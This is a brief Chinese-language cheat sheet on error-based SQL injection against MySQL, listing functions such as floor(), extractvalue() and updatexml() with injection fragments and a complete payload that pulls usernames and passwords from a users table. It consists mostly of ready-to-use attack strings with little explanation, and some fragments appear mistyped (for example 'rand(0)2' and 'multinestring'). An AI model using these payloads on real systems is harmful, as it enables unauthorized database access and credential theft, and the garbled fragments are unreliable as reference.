什么时候用
页面没有回显示
常用的报错函数
1.floor()
and (select count() from information_schema.tables group by concat ((select version)),floor(rand(0)2))
2.extractvalue()
and (extractvalue(1,concat(0x7e,(select user()),0x7e)))
3.updatexml()
and (select updatexml(1,concat(0x7e,(select user()),0x7e),1))
4.geometrycollection()
5.multipoint()
6.polygon()
7.multipolygon()
8.linestring()
9.multinestring()
10.exp()
以extractvalue()为例的注入
1.版本信息
2.数据库名
3.获取表名
4.列名
5.获取数据
1234' and extractvalue(1,concat(0x7e,(select concat(username,0x3a,password) from users limit 0,1),0x7e))#
不能使用此语句从查询是因为,update里不能将正在使用表的数据更新到这个表里
